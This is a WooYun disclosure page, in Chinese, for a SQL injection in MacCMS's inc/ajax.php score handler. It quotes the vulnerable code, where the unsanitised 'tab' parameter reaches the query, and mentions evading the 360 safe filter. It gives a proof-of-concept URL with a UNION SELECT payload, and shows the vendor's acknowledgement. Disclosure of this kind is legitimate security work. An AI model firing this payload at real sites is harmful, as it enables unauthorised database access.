苹果CMS SQL注入一枚 | wooyun-2014-066285| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066285

漏洞标题：苹果CMS SQL注入一枚

漏洞作者： magerx

提交时间：2014-06-27 19:01

修复时间：2014-09-25 19:02

公开时间：2014-09-25 19:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-27：细节已通知厂商并且等待厂商处理中
2014-06-27：厂商已经确认，细节仅向厂商公开
2014-06-30：细节向第三方安全合作伙伴开放
2014-08-21：细节向核心白帽子及相关领域专家公开
2014-08-31：细节向普通白帽子公开
2014-09-10：细节向实习白帽子公开
2014-09-25：细节向公众公开

简要描述：

看到之前一发路人甲的漏洞，厂商说未测试成功，我也换个地方试试

详细说明：

WooYun: 苹果CMS系统sql注入一枚
这个漏洞，厂商说未测试成功，然后继续换个地方看看。
inc/ajax.php:123行

elseif($ac=='score')
{
	if($id<1){ echo "err"; return;}
	$score = intval(be("get", "score"));
	$res = '{"scoreall":0,"scorenum":0,"score":0.0}';
	if($score<0) { $score = 0;} elseif( $score > 10) { $score = 10; }
	if($tab=='art') { $col='a'; } else { $col='d'; }
	
	$sql="SELECT ".$col."_score,".$col."_scoreall,".$col."_scorenum FROM {pre}".$tab." WHERE ".$col."_id=" .$id;
	$row=$db->getRow($sql);
	if($row){
		$d_score = $row["d_score"];
		$d_scoreall = $row["d_scoreall"];
		$d_scorenum = $row["d_scorenum"];
		
		if($score>0){
			if(getCookie($tab."score".$id)=="ok"){ echo "haved"; return;}
			$d_scoreall +=  $score;
			$d_scorenum++;
			$d_score = round( $d_scoreall / $d_scorenum ,1);
			$db->Update ("{pre}vod",array($col."_score",$col."_scoreall",$col."_scorenum"),array($d_score,$d_scoreall,$d_scorenum),$col."_id=".$id);
			sCookie ($tab."score".$id,"ok");
		}
		if($d_score>10) { $d_score=10; }
		$res = '{"scoreall":'.$d_scoreall.',"scorenum":'.$d_scorenum.',"score":'.$d_score.'}';
	}
	unset ($row);
	echo $res;
}

上面可以看到$id>=1,$tab可控，$score我们不用管,这时候我们让$col='d';table就必须是mac_vod了，所以这里只需要让360_safe3.php不拦截我们就可以注入了。
因此这种注入应该还是需要从自身代码层杜绝，而不该依赖第三方防护脚本。
直接注入肯定被拦截：

poc:

http://localhost/maccms/inc/ajax.php?ac=score&id=1&tab=vod union select/**/1,user(),3 from dual%23

漏洞证明：

看到厂商说没时间改代码了，看来还是不要继续看了～～

修复方案：

～。～

版权声明：转载请注明来源 magerx@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-06-27 21:25

厂商回复：

感谢您对苹果cms的测试，请在官方下载最新版本内测试。down点maccms点com

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066285

漏洞标题：苹果CMS SQL注入一枚

相关厂商：maccms.com

漏洞作者： magerx

提交时间：2014-06-27 19:01

修复时间：2014-09-25 19:02

公开时间：2014-09-25 19:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 magerx@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066285

漏洞标题：苹果CMS SQL注入一枚

相关厂商：maccms.com

漏洞作者： magerx

提交时间：2014-06-27 19:01

修复时间：2014-09-25 19:02

公开时间：2014-09-25 19:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-066285"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 magerx@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：